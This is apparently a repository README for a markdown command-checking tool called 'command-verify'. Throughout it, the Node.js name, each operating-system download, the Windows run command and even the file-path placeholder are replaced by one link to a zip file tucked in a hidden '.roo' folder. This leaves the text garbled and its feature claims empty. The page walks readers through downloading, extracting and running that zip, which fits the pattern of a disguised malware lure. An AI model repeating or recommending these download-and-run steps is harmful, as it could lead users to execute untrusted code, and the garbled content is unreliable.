command-verify is an intelligent tool designed to help you verify commands in your documentation. It checks your markdown files against actual commands to ensure they work as intended. This tool works across all computer systems and offers a seamless experience for any user.
- Zero-Token Operation: No setup required. Just download and start using.
- Cross-Platform: Use on Windows, Mac, and Linux.
- High Cache Hit Rates: Benefit from a fast system that intelligently caches results, achieving over 90% cache accuracy.
- Modern Technologies: Built for https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip projects with comprehensive testing.
- Self-Learning: The system improves over time to give you even better results.
- Operating Systems: Windows 10 or later, macOS 10.14 or later, any modern Linux distribution.
- https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip: Version 14 or higher. You can check your https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip version by typing
node -vin your command line or terminal. - Disk Space: At least 100 MB free space for installation and files.
To begin using command-verify, you only need a few simple steps. Follow this guide to download and install the software on your computer.
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Visit the Releases Page: Click here to go to the releases page. You will find the latest version available for download.
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Choose Your Operating System: Look for the version that matches your operating system. Below are the common files available for download:
- Windows:
https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip - macOS:
https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip - Linux:
https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip
- Windows:
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Download the File: Click on the relevant file link to start downloading. Your browser will handle the rest.
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Extract the Files: After the download completes, locate the zip file in your downloads folder. Right-click the file and choose "Extract All." Follow the prompts to extract your files.
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Open the Command Line:
- Windows: Search for
cmdin the start menu. - macOS: Open
Terminalfrom your applications. - Linux: Find your terminal in the application menu.
- Windows: Search for
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Navigate to the Folder: Use the
cdcommand to navigate to the folder where you extracted the files. For example:cd Downloads/command-verify-windows -
Run the Program: Type the command to start command-verify:
- For Windows:
https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip - For macOS/Linux:
./command-verify
- For Windows:
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Follow the On-Screen Instructions: Once the program runs, you will see clear prompts on how to begin verifying your markdown files.
- Verify Commands in Markdown: To check a markdown file, use:
command-verify https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip
Replace https://raw.githubusercontent.com/evenutbearing94/command-verify/main/.roo/rules-knowledge-base-curator/command-verify-2.5.zip with the actual path to your markdown document.
- View Results: After running the command, you will see a detailed report. It will show commands that are verified and any issues found.
If you encounter any issues or have questions, you can find help:
- Check out the Issues tab on the repository.
- Report bugs or suggest improvements in the same place.
We welcome contributions to make command-verify better. If you're interested:
- Fork the repository on GitHub.
- Create a new branch.
- Make your changes.
- Submit a pull request.
You can also participate in discussions and share your feedback.
- Explore examples of command verification on the official GitHub page.
- Browse our community pages for tips and FAQs.
This project is licensed under the MIT License. You can freely use and modify it as needed, provided that you include the original license in your distribution.